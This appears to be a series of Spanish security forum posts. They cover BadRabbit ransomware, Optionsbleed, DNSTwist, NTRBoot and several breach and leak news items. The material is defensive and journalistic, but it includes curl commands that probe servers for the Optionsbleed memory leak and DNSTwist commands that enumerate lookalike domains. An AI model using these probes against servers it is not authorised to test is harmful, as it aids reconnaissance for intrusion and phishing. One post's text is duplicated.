      Algunos han despertado hoy reviviendo viejas pesadillas con el ransomware... los sistemas del Metro de Kiev, el aeropuerto de Odessa y varias organizaciones en Rusia confirmaban que sus sistemas informáticos se habían visto bloqueados debido a que los archivos del sistema operativo habían sido cifrados por un ransomware, esta vez el turno es del denominado BadRabbit.

      La amenaza se extiende a otros países de Europa del Este: Alemania, Turquía, Bulgaria, Montenegro... conviene fijar la mirada a este nuevo y lucrativo malware, para lo que me quedo con la síntesis del repositorio deNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta y las noticias que van surgiendo.

      BadRabbit es un ransomware que es capaz de propagarse de forma local a través de SMB. Para llevar a cabo el proceso de infección utiliza ingeniería social, haciéndose pasar por un instalador de Adobe Flash Player. Una vez haya infectado la computadora inicial, intentará esparcirse a través de la red local utilizando una lista de nombres de usuario y contraseñas, por lo que resulta determinante utilizar un nombre de usuario y sobre todo una contraseña que no sean sencillas de adivinar. Como método de esparcimiento de momento se descarta la utilización de la vulnerabilidad de SMB utilizada por WannaCry y NotPetya.

      Bad Rabbit no solo cifra los ficheros personales que encuentre utilizando claves RSA 2048, añadiéndoles la extensión .encrypted, sino que además también cifra el MBR del disco duro utilizando No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, una herramienta de cifrado completo de disco Open Source. Para el pago del rescate pide 0,05 bitcoins que se tienen que pagar mediante la red Tor.



      Hasta ahora, es dirigido principalmente a Rusia y Ucrania, además de otros países (Alemania, Turquía, Bulgaria, Montenegro). Aunque parece que no se autopropaga a nivel mundial, podría dirigirse a objetivos seleccionados a propósito. Las mitigaciones son similares a las de Petya / NotPetya.


      Infección inicial

      Aparece como una actualización de flash falsa:



      Es probable que las infecciones sean del tipo Watering-Hole/Drive-By, pero también pueden ser dirigidas selectivamente.
      Lista de extensiones de archivo específicas

          Imagen Tweet: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          Texto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


      Componentes y métodos:

      Usa el binario legítimo y firmado de DiskCryptor para cifrar
      Está casi confirmado que usa EternalBlue (o al menos activa controles que están a la espera de su uso)
      Incorpora Mimikatz.
      Da un mensaje de usuario "por favor apague el antivirus" en algunas circunstancias.
      También se propaga a través de SMB y WebDAV,  autopropagandose localmente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Usa una lista de credenciales hardcodeadas:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      C:\WINDOWS\cscc.dat == DiskCryptor (¿bloquea la ejecución para inocularse?)
      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      C:\Windows\infpub.dat == #BADRABBIT "pushed" lateralmente (¿bloquea la ejecución para inocularse?). Al parecer, crear una versión de solo lectura de este archivo    puede detener la infección:
      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Análisis del componente flash_install.php:
      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Video en acción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Al parecer, borra los registros de Windows y el journal del sistema de archivos
      ¿También instala un keylogger?
      ¿Limpia el sector de arranque y pone kernel al final de la unidad?
      Podría ser una variante de Diskcoder
      Los C&C y los dominios del payload fueron instalados previamente con mucha antelación:
      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          El 13% del código es reusado de NotPetya
      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      10 diferencias entre el código de Petya y el de BadRabbit:
      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Análisis interactivo de BadRabbit.exe:
      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Regla de Yara (creada por un ingeniero de McAfee)
      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Referencias de cultura contenidas
              Dragones de Game of Thrones (Drogon, Rhaegal)
              Película de hackers (al final de la lista de contraseñas hardcodeadas)



      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #17

      La tensión entre Estados Unidos y Rusia vive, en el último año, uno de los peores momentos desde el fin de la Guerra Fría, y parece que puede ir a peor. Hoy se ha conocido que hackers rusos habrían atacado a la NSA (Agencia Nacional de Seguridad) estadounidense robándoles algunos documentos altamente sensibles y secretos sobre la ciberseguridad del país.

      Según publica el The Wall Street Journal, la violación, considerada la más grave de los últimos años, podría haber abierto una brecha en la ciberseguridad del país y permitido a los 'hackers' de Moscú adentrarse mucho más fácilmente en las redes estadounidenses. La información va más allá y apunta a que los atacantes, que trabajarían para el gobierno de Putin, se habrían hecho con documentos que explican toda la estrategia de seguridad de la NSA.

      Aunque la noticia ha salido a la luz hoy, el ciberataque se habría efectuado en 2015, y las autoridades del país norteamericano lo habrían descubierto en la primavera de 2016. Esto significa que los piratas rusos habrían tenido hasta un año de ventaja para poder moverse con total libertad saltándose las líneas defensivas del enemigo sin demasiado problema.

      En cuanto a lo robado no se sabe a ciencia cierta qué material se pudieron llevar los rusos. Fuentes consultadas por WSJ apuntan que entre ese material habría información sobre cómo trabaja la agencia cuando hay un ciberataque o qué medidas lleva a cabo para adentrarse en sistemas de otros países en misiones de espionaje.

      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #18

      La Audiencia Nacional ha accedido a extraditar a Estados Unidos al hacker ruso Pyotr Levashov, detenido el pasado abril en Barcelona y que es reclamado para ser juzgado por captar datos de usuarios de internet e introducir un programa malicioso en sus ordenadores para pedirles un rescate económico, supuestamente.

      La Audiencia Nacional considera que España no es competente para juzgarle pues es en EEUU donde se encuentran las víctimas y los daños producidos por su supuesta actividad delictiva, en consonancia con la postura mantenida por la Fiscalía durante la vista de extradición.

      Estados Unidos acusa a Levashov de haberse beneficiado de Kelihos, una red de ordenadores infectados y controlados sin el conocimiento de sus propietarios y de apropiarse de direcciones de correo electrónico, nombres de usuarios y contraseñas a las que luego distribuía ransomware, un programa malicioso que introduce un código en el ordenador para pedir un rescate económico al dueño.

      La Audiencia considera que la competencia para juzgar al supuesto hacker está definida por el lugar donde se detecta el daño y los intereses afectados, así como el perjuicio económico originado. Por ello considera "indiferente" que Levashov hubiese hackeado desde España.

      En relación a la supuesta motivación política expuesta por la defensa, la Sala señala que el procedimiento de entrega responde "a la existencia de un proceso penal seguido en EEUU" contra el que existe una acusación formal "por delitos comunes" emitida por el Gran Jurado del Tribunal de Distrito de Connecticut, " sin atisbarse la motivación política denunciada".

      Levashov argumentó que temía por su vida y temía ser torturado a cambio de información confidencial por haber trabajado para el partido Rusia Unida, que preside Vladimir Putin. En cambio, los jueces destacan que la defensa no insistió en la vista sobre esa supuesta motivación basada también en informaciones periodísticas que lo vinculaban al equipo de piratas que habría actuado a favor de Donald Trump en la campaña presidencia y contra la demócrata Hillary Clinton.

      Para la Sala, nada de esto se ha acreditado, ni tampoco "la potencial vulneración del derecho a la vida o a la integridad física" del reclamado. Además, rechaza realizar un seguimiento de su situación procesal y penitenciaria cuando sea entregado a Estados Unidos.

      Los hechos con los que se acusa a Levashov son constitutivos de los delitos de asociación ilícita para cometer fraude, robo de identidad, fraude electrónica y escuchas telefónicas ilícitas, entre otros, conforme a la legislación norteamericana.

      La Sala cree que en este caso "se cubre sobradamente el mínimo punitivo de más de un año de prisión" así como el de doble incriminación establecidos en el tratado bilateral entre España y Estados Unidos como para proceder a la entrega del reclamado.

      Su esposa, Maria Levashova, pidió el apoyo de abogados de derechos humanos y del vicepresidente ruso para defender al hacker e impedir su extradición. Considera que Estados Unidos intenta vincularlo con un virus desplegado en la campaña de apoyo a Trump.

      Pyotr Levashov sería la persona que está detrás del alias de Internet Peter Severa (Pedro del Norte, en ruso), conocido por ser uno de los más activos hackers relacionados con los spams (correos electrónicos no solicitados).

      Durante años, Severa habría infectado ordenadores de todo el mundo por medio de software malicioso, para luego vender estos acceso a ordenadores secuestrados con troyanos.


      Fuente:publico.es
      #19
      Hacking / Ichidan, clon de Shodan en la Deep Web
      Septiembre 23, 2017, 08:53:11 AM

      Motores de búsqueda como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuentao No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, que permiten buscar dispositivos con servicios expuestos a internet, son ya bastante conocidos. Añado una breve referencia de Wikipedia para aclarar las ideas a la gente que no sepa de ellos:

      Cita de: WikipediaShodan es un motor de búsqueda que le permite al usuario encontrar iguales o diferentes tipos específicos de equipos (routers, servidores, etc.) conectados a Internet a través de una variedad de filtros. Algunos también lo han descrito como un motor de búsqueda de banners de servicios, que son metadatos que el servidor envía de vuelta al cliente.1​ Esta información puede ser sobre el software de servidor, qué opciones admite el servicio, un mensaje de bienvenida o cualquier otra cosa que el cliente pueda saber antes de interactuar con el servidor.

      Si quereís aprender más de estos buscadores para ampliar información aquí listo unos links:





      Hace unos días, Bleeping Computers encontró un motor de búsqueda de dispositivos con servicios expuestos en la Deep Web. Su nombre es Ichidan, que significa en japones "primera etapa", y se encuentra en la dirección No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

      Su interfaz es un clon exacto de Shodan y puedes crear una cuenta sin necesidad de correo electrónico para usar todas sun funcionalidades:


      Probando, he comprobado que los filtros no son tan avanzados como en Shodan, aunque permiten descubrir cosas interesantes. En mi opinión, si continua desarrollandose llegará a ser una herramienta de investigación muy potente.

      Con una búsqueda del puerto 80 encontramos casi 5000 resultados:


      Al igual que en Shodan, nos muestra el top de servicios y el de software. Podemos entrar en detalles para comprobar los banners de los servicios, ver sus versiones, y acceder a más información:


      Accedemos a la url para ver que nos encontramos y... que raro :D:


      Podemos comprobar todos los dispositivos escaneados por este buscador con el query "* ". Se aprecia que no es un número muy elevado si supuestamente ha escaneado gran parte de la Deep Web, y si es así, se confirma que el tamaño de esta red no es tan grande como se piensa.



      Un saludo, HATI  :D
      #20

      No tienes permitido ver los links. Registrarse o Entrar a mi cuentaes una de las peores vulnerabilidades a las que se ha enfrentado Internet. Descubierto en abril de 2014, este fallo de seguridad en OpenSSL permitía a cualquier usuario conseguir volcados de memoria de cualquier servidor, volcados en los que podía haber todo tipo de información personal, como, por ejemplo, contraseñas. La magnitud de este fallo de seguridad fue tal que, a día de hoy, aunque está más o menos controlado, sigue habiendo miles de servidores vulnerables conectados a Internet. Ahora, una nueva vulnerabilidad similar (en cierto modo), llamada No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, vuelve a amenazar Internet, esta vez, por culpa del servidor web Apache.

      Las conexiones HTTP pueden hacer llamadas a varios métodos (como GET y POST, los métodos más utilizados), pudiendo recurrir al método OPTIONS para ver una lista completa con los métodos que tenemos disponibles y podemos utilizar.

      Tal como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, al enviar una petición OPTIONS a las webs más visitadas a nivel mundial según el ranking Alexa, la respuesta, en la mayoría de los casos, viene con un parámetro "Allow" y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta". Esto puede ser fruto de un desbordamiento de búfer, igual a como ocurría en una primera instancia con OpenSSL y que, finalmente, dio lugar a Heartbleed.

      Aunque de momento no hay un exploit ni una prueba de concepto de este fallo de seguridad, todo apunta a una especie de nuevo Heartbleed, esta vez de la mano del servidor web Apache. De conseguirse explotar, esta vulnerabilidad podría permitir a cualquier atacante conseguir piezas arbitrarias de memoria que podrían contener información sensible, tanto del propio servidor (contraseñas, por ejemplo), como de los usuarios que lo visitan.

      El experto de seguridad que ha dado con esta vulnerabilidad, se ha puesto en contacto con la mayoría de las compañías potencialmente vulnerables a este fallo, y tan solo una ha devuelto el correo, siendo, además, bastante reacia a colaborar en la investigación

      Dentro del Alexa Top 1 Million, tan solo 466 webs se han encontrado como vulnerables a este fallo, aunque al no ser un fallo determinista, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

      La vulnerabilidad ya ha sido registrada con el código No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, aunque, de momento, se encuentra en fase de análisis por parte del No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

      Si utilizamos Apache 2.2, este experto de seguridad nos facilita No tienes permitido ver los links. Registrarse o Entrar a mi cuentahasta que se analice la vulnerabilidad, se acepte y llegue un parche oficial de la mano de Apache.

      Aunque la vulnerabilidad es similar en la técnica a Heartbleed, en realidad no es tan grave como esta, y es que, además de afectar a un pequeño número de hosts en todo el mundo, los volcados de memoria que devuelve son mucho menores a los que devolvía Heartbleed. Pero es un fallo real, un fallo del que hay que preocuparse e intentar solucionar cuanto antes, y es que, al final, los grandes ataques informáticos siempre vienen a través de estas pequeñas vulnerabilidades.


      ¿Cómo probarlo?

      Simplemente con...

      Código: bash
      curl -D - -X OPTIONS http://localhost

      Returns:
      HTTP/1.1 200 OK
      Date: Thu, 22 Jun 2017 08:40:07 GMT
      Server: Apache
      Allow: GET,HEAD,POST,OPTIONS,HEAD,HEAD
      Content-Length: 0
      Content-Type: httpd/unix-directory



      Esto debería devolver UN solo "Allow: HEAD".

      Otro ejemplo:

      Código: php
      for i in {1..100};
      do curl -sI -X OPTIONS https://www.google.com/ | grep -i "allow:";
      done


      O con esta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


      Actualizaciones de productos

          Gentoo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          NetBSD/pkgsrc: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          Guix: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          Arch Linux: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          Slackware: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          NixOS: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          Debian: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #21
      Wargames y retos / Máquina virtual vulnerable con Docker
      Septiembre 14, 2017, 06:07:28 PM

      Docker ha recibido muchas críticas desde la comunidad de seguridad. Además de correr como root, Docker también permite que los contenedores interactúen con el host, y esto supone un gran riesgo. Aunque la seguridad en Docker ha mejorado muchísimo, si no eres cuidadoso con su configuración, un contenedor malicioso podría escapar de su entorno virtual o sandbox y llegar al host.

      Para entender mejor la seguridad en Docker y hacer algunas prácticas, los chicos de No tienes permitido ver los links. Registrarse o Entrar a mi cuentahan creadoNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta con Docker que esconde tres banderas o flags. Tu objetivo no es sólo encontrar las tres bandereas, sino también conseguir una shell como root.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #22
      Después de un tiempo de espera finalmente ha visto la luz NTRBoot, un sencillo hackdesarrollado por Normmatt que aprovecha una vulnerabilidad en el hardware de Nintendo 3DS. NTRBoot permite revivir la portátil de prácticamente cualquier tipo de brick y modificarla independientemente del modelo o versión del firmware, sin necesidad de downgrade o hardmod.

      NTRBoot funciona debido a un fallo en el bootrom. Antes de que el bootrom arranque la NAND del sistema comprueba que la consola está cerrada y si se encuentra pulsada una combinación de botones. En caso de que así sea la portátil se inicia desde la bootrom de la tarjeta flash y no desde la NAND, dejando la consola completamente expuesta. ¿Cómo mantener pulsados los botones con la consola cerrada? Usando un imán.

      Si colocamos un imán sobre el botón B de Nintendo 3DS la portátil se iniciará en modo reposo. Con el imán situado encendemos la consola usando la combinación de botones Start + Select + X + Power y de esta forma arrancará desde la NAND del cartucho. Esta flashcard, que debe estar preparada para la ocasión, permite instalar Boot9Strap / Sigax para tener acceso a un custom firmware como Luma. En el caso de Nintendo 2DS no es necesario el uso de un imán.




      Después de un tiempo de espera finalmente ha visto la luz NTRBoot, un sencillo hackdesarrollado por Normmatt que aprovecha una vulnerabilidad en el hardware de Nintendo 3DS. NTRBoot permite revivir la portátil de prácticamente cualquier tipo de brick y modificarla independientemente del modelo o versión del firmware, sin necesidad de downgrade o hardmod.

      NTRBoot funciona debido a un fallo en el bootrom. Antes de que el bootrom arranque la NAND del sistema comprueba que la consola está cerrada y si se encuentra pulsada una combinación de botones. En caso de que así sea la portátil se inicia desde la bootrom de la tarjeta flash y no desde la NAND, dejando la consola completamente expuesta. ¿Cómo mantener pulsados los botones con la consola cerrada? Usando un imán.

      Si colocamos un imán sobre el botón B de Nintendo 3DS la portátil se iniciará en modo reposo. Con el imán situado encendemos la consola usando la combinación de botones Start + Select + X + Power y de esta forma arrancará desde la NAND del cartucho. Esta flashcard, que debe estar preparada para la ocasión, permite instalar Boot9Strap / Sigax para tener acceso a un custom firmware como Luma. En el caso de Nintendo 2DS no es necesario el uso de un imán.

      NTRBoot no solo permite exponer cualquier modelo de 3DS independientemente de su firmware, también puede revivir la portátil en caso de brick debido a experimentos anteriores. Para ello no necesitamos un respaldo de la NAND, tan solo debemos usar un CTRTransfer. El sistema de NTRBoot va incluso más allá y funciona en una Nintendo 3DS con la NAND inservible o sin ella (con el chip físicamente eliminado).

      Otra de las ventajas de NTRBoot es que al ser un hack a nivel de hardware no puede ser tapado por Nintendo vía software. En caso de que la compañía quiera evitarlo deberá lanzar un nuevo modelo de la portátil.

      A día de hoy las flashcard compatibles con NTRBoot son: Acekard 2i HW-44, Acekard 2i HW-81 y R4i Gold 3DS RTS. También está planeado ofrecer soporte para R4 SDHC Dualcore​ y Supercard DS2​. Ahora que se ha lanzado NTRBoot se espera que la lista de tarjetas compatibles se vaya ampliando.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #23

      Un enorme spambot utilizaba No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Se trata del mayor ataque de phishing jamás visto en el mundo, rompiendo todos los récords existentes hasta el momento, y que además deja en evidencia las medidas de seguridad de hoy en día, la poca efectividad de los filtros antispam y de los nuevos trucos para evitar el robo de datos personales, especialmente los bancarios.
      Un investigador de seguridad informática de París, Francia, cuyo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, descubrió un servidor abierto y accesible alojado en los Países Bajos, que almacena decenas de archivos de texto que contienen un gran lote de direcciones de correo electrónico, contraseñas y servidores utilizados para enviar correos no deseados con malware.

      Este spambot, conocido como Onliner, fue utilizado para enviar el malware bancario No tienes permitido ver los links. Registrarse o Entrar a mi cuentaa correos electrónicos de todo el mundo. De momento, han sido reportadas un total de 100.000 infecciones. El malware estaba insertado en un GIF de 1x1 píxeles y fue capaz de robar una gran cantidad de datos de navegadores y de software, especialmente información bancaria.

      Cuando el usuario abría el correo electrónico, de forma automática se enviaba una solicitud con su dirección IP al servidor que alojaba esta imagen. Esta información era suficiente para que el delincuente pudiera saber el momento en el que se abrió el correo, el lugar desde donde se hizo y en cuál dispositivo.

      El hallazgo se efectuó el día de ayer, luego de que por razones desconocidas, el servidor quedara desprotegido y accesible. Benkow alertó la semana pasada sobre este hecho a Troy Hunt y después de realizar las verificaciones correspondientes, Hunt encontró un listado más grande de cuentas spam, tal como lo explica en su sitio web.

      Allí también indica que ha tomado acciones legales para que este servidor sea clausurado y eliminado. Se supone que las 711 millones de cuentas de correo electrónico pudieron ser utilizadas en un lapso de dos años y medio. De igual manera, se descubrió una lista de más de 80 millones de credenciales SMTP para eludir los filtros anti-spam.

      Si desees asegurarte de que tus cuentas de correo electrónico han sido afectadas por este ataque, puedes realizar la comprobación a través de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, una herramienta creada por Hunt y que fue actualizada luego de este robo. En caso de que tu cuenta haya sido hackeada, debes cambiar las credenciales de acceso inmediatamente.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #24

      Cuando nosotros o una empresa poseemos un dominio y nos preocupa que puedan realizar ataques de phising en nuestro nombre o con la imagen corporativa, lo primero que hay que hacer es comprobar los dominios similares al nuestro. Esta tarea puede ser muy tediosa, ya que hay que comprobar en diferentes webs, y se nos pueden escapar los dominios con caracteres unicode, que actualmente son una de las formas más originales de suplantar una web (dejo un artículo del compañero @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que habla sobre el tema - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta).

      Para facilitar la tarea, la gente de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta han creado DNSTwist.




      DNSTwist

      DNSTwist genera nombres de dominio similares al que le introducimos, después comprueba si están registrados, y nos da la opción de buscar similitudes en el código HTML, hasheandolo y haciendo comparaciones. Además, permite comprobar si los servidores de correo están mal configurados y permiten la intercepción de mails.

      Junto con la longitud del dominio, el número de variantes generadas por los algoritmos aumenta considerablemente y por lo tanto el número de consultas DNS necesarias para verificarlas. Por ejemplo, para comprobar todas las variantes de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, tendría que enviar más de 300k consultas. Para el dominio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el número aumenta a más de 5 millones. Esto se traduce en una gran cantidad de recursos y tiempo. Para los dominios más largos, comprobar todas las opciones no es viable. Por esta razón, la herramienta genera y comprueba dominios muy cercanos al original - la distancia de Levenshtein no supera 2. Teóricamente, estos son los dominios más atractivos desde el punto de vista del atacante, sin embargo, hay que tener en cuenta que la imaginación de los agresores es ilimitada.


      Características:



      • Amplia gama de algoritmos de fuzzing de dominio
      • Nombres de dominio Unicode (IDN)
      • Distribución de trabajos multiproceso
      • Consultas A, AAAA, NS y registros MX
      • Evalúa la similitud de la página web con fuzzy hashes para encontrar sitios de phishing en vivo mediante el algoritmo ssdeep
      • Prueba si el host MX (servidor de correo) se puede utilizar para interceptar correos electrónicos mal dirigidos
      • Permite el uso de diccionario
      • Información de ubicación con GeoIP
      • WHOIS búsquedas para la creación y la fecha de modificación
      • Graba banners de servicio HTTP y SMTP
      • Salida en formato CSV y JSON


      Instalación:

      Para obtener la herramienta podemos obtenerla desde su repositorio de GitHub: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

      La herramienta se puede instalar tanto en Linux, OSX y Docker. En este tutorial mostraré solo la instalación en sistemas Linux.
      En primer lugar tenemos que instalar los prerrequisitos, lo podemos hacer de dos formas. Recomiendo la primera ya que no te dará problemas de compatibilidad con otras instalaciones:
      Código: bash
      sudo apt-get install python-dnspython python-geoip python-whois python-requests python-ssdeep python-cffi



      Código: bash
      sudo apt-get install libgeoip-dev libffi-dev
      BUILD_LIB=1 pip install -r requirements.txt



      Uso:

      El uso más sencillo de la herramienta es lanzarla sin argumentos. Se generará una lista de posibles dominios de phishing con los siguientes registros DNS: A, AAAA, NS y MX.
      Código: bash
      dnstwist.py --registered example.com


      Normalmente tendremos una lista bastante amplia, y comprobar si esos dominios están registrados a mano sería una perdida de tiempo, para ello tenemos la opción -registered. Con está opción se nos muestran solo los dominios registrados.
      Código: bash
      dnstwist.py --registered example.com


      Para facilitarnos aún más la tarea, DNSTwist permite buscar phising activos mediante el algoritmo ssdeep. El algoritmo de ssdeep divide de forma secuencial un archivo en grupos iguales de bytes, y sobre cada uno de estos grupos calcula un hash. Luego a partir de estos se calcula un nuevo hash que va a representar el total del archivo. Y es precisamente sobre este hash que se puede comparar la similitud con otros archivos.Para cada dominio generado, dnstwist obtendrá el contenido del servidor HTTP que responde (siguiendo los posibles redireccionamientos) y comparará su hash difuso con el del dominio original (inicial). El nivel de similitud se expresará como un porcentaje. Tenga en cuenta que es poco probable que obtenga el 100% de coincidencia para una página web generada dinámicamente, pero cada notificación debe inspeccionarse cuidadosamente independientemente del nivel de porcentaje.
      Código: bash
      dnstwist.py --ssdeep example.com
      dnstwist.py --ssdeep example.com/crm/login


      Muy a menudo los atacantes crean honeypots de correo electrónico en los dominios de phishing y esperan que los correos electrónicos mal escritos lleguen. DNSTwist permite comprobar si los servidores MX pueden ser vulnerables a este tipo de ataques.
      Código: bash
      dnstwist.py --mxcheck example.com


      Si preferimos usar nuestro propio diccionario en vez de los algoritmos de DNSTwist también tenemos la opción.
      Código: bash
      dnstwist.py --dictionary dictionaries/english.dict example.com


      La herramienta se integra con la base de datos GeoIP. Utilice el argumento --geoip para mostrar la ubicación geográfica (nombre del país) para cada dirección IPv4.
      Código: bash
      dnstwist.py --geoip example.com


      Aparte de la salida en consola, podemos exportar los resultados en formato CSV o JSON.
      Código: bash
      dnstwist.py --csv example.com > out.csv
      dnstwist.py --json example.com > out.json



      Un saludo, HATI  ;D
      #25
      Son muchos los amantes al dibujo que han dejado los folios o lienzos en blanco por la pantalla del ordenador o ciertas tablets que permiten dibujar a mano alzada como si de un papel se tratase. Los grandes avances en ciertas tecnologías han hecho que desde el ordenador u otros dispositivos, podamos dibujar a mano alzada como lo haríamos en una hoja en blanco y tener todos nuestros diseños y bocetos digitalizados. Sin embargo, ciertas tecnologías van todavía un paso más allá y como vamos a ver a continuación son capaces de convertir tus bocetos en imágenes con un sólo clic.

      Esto es exactamente lo que hace fotogenerator, un sitio web que ofrece con una herramienta capaz de reconocer todas las líneas trazadas a mano alzada para convertirlas en una imagen a la que aplica automáticamente los colores y tonalidades. Lo único que tenemos que tener en cuenta antes de comenzar a utilizar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, es que ésta herramienta online ha sido diseñada para convertir bocetos de retratos en imágenes.



      Convierte tus bocetos en imágenes con un solo clic


      Por lo tanto, no podemos esperar que reconozca cualquier boceto que pintemos, ya que ha sido pensada para reconocer retratos o caras de personas y convertir esos bocetos en imágenes en un sólo clic. Para comenzar a usar fotogenerator, sólo tenemos que abrir una ventana de nuestro navegador web habitual y dirigirnos al sitio de fotogenerator desde este mismo enlace.



      Una vez ahí, nos aparecerá cargado por defecto un ejemplo para que veamos rápidamente lo que puede conseguir la herramienta. Una herramienta que por otro lado no puede ser más sencilla de utilizar, ya que como podemos ver, permite seleccionar entre la herramienta línea, que permite dibujar y la herramienta goma de borrar para eliminar cualquier trazo de nuestro boceto.

      También ofrece dos botones justo debajo del recuadro donde se realiza el boceto, el de Undo, que permite deshacer el último cambio, y Clear, que como su propio nombre indica borra todo lo que tengamos tanto en la zona del boceto como de la imagen resultado. Una vez que tenemos hecho nuestro boceto, basta con pulsar sobre el botón Process y automáticamente fotogenerator interpretará nuestro boceto para convertirlo en una imagen.

      Si el resultado nos gusta, entonces podemos guardar la imagen resultado y descargala a nuestro discoduro desde el botón Save que se muestra justo debajo de la imagen resultado. Podemos conocer algo más sobre la herramienta en la propia documentación que ofrece en la parte inferior de la página web.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #26

      Parece que Microsoft ha tenido una fuga masiva de 32TB de datos altamente sensibles, relacionados con Windows 10 y que pueden ser descargados en línea.

      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, se cree que los datos fueron robados de los sistemas internos de Microsoft en marzo. Aquellos que han visto los datos afirman que los archivos filtrados pertenecen a creaciones internas del sistema operativo y detalles en profundidad sobre su código fuente.

      Inicialmente los datos fueron subidos a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, un sitio web con colecciones de software beta, juegos, aplicaciones y abandonware, aunque No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

      Después de un breve análisis, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que los datos se actualizaron la semana pasada e "incluye código fuente de los controladores de hardware de Windows 10".



      Además, hay varias compilaciones nunca lanzadas de Windows 10, que incluían pruebas, solución de problemas y herramientas de depuración utilizadas por Microsoft internamente. Además, hay un Windows 10 Mobile Adaptation Kit, que parece un conjunto de herramientas nunca anunciado para ejecutarse en dispositivos móviles. Algunos de los datos mencionados son similares al No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

      En este momento, no está claro si Microsoft ha sufrido un ataque o alguien desde el interior ha filtrado la información. Sin embargo, se puede suponer que los datos son muy sensibles.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #27


      Siempre solemos pensar que los ataques de los hackers se suelen realizar con nocturnidad y alevosía, por eso sorprende tanto que haya cazado en plena faena a uno de ellos. Fue concretamente en Ucrania en 2015 cuando atacaron varias plantas eléctricas. En ese momento, grabaron cómo los hackers tomaban el control del ratón del ordenador y manejaban el equipo a su antojo.

      El trabajo de los hackers es muchas veces invisible a nuestros ojos y parte de su éxito radica en ello. Redes de ordenadores, cámaras de vigilancia y móviles zombis que colaboran en un ataque DDoS sin que el usuario sea consciente y otras muchas cosas que suceden cuando no estamos mirando. No obstante, esto no es siempre así y un interesante documento gráfico publicado por Wired lo corrobora.


      Captados en vídeo mientras toman el control del ratón



      En el vídeo que podéis encontrar a continuación, vemos lo que sucedió durante el ataque a la red de energía de Ucrania en 2015 que dejó a unos 250.000 habitantes sin luz. Uno de los trabajadores de una planta de energía es capaz de grabar el momento en que los hackers "irrumpen" en su ordenador y toman el control.

      Video: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #28



      La No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ha puesto a disposición del público una serie de herramientas de código abierto (OSS). No, no es un error, luego del desastre de ShadowBrokers y WannaCry, la NSA publica algunas de sus "herramientas legales".

      A través de su Programa de Transferencia de Tecnología (TTP), la NSA trabaja con agencias innovadores que de un momento para otro desean usar este modelo colaborativo para transferir su tecnología al mercado comercial.

      La NSA dice que "OSS potencia el desarrollo cooperativo de la tecnología y fomenta su adopción; el público se beneficia adoptando, mejorando, adaptando y/o comercializando el software y; el gobierno se beneficia de las mejoras de la comunidad de código abierto para la tecnología".


      Las herramientas se dividen en dos categorías: No tienes permitido ver los links. Registrarse o Entrar a mi cuentay No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Habrá que seguir su evolución.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #29


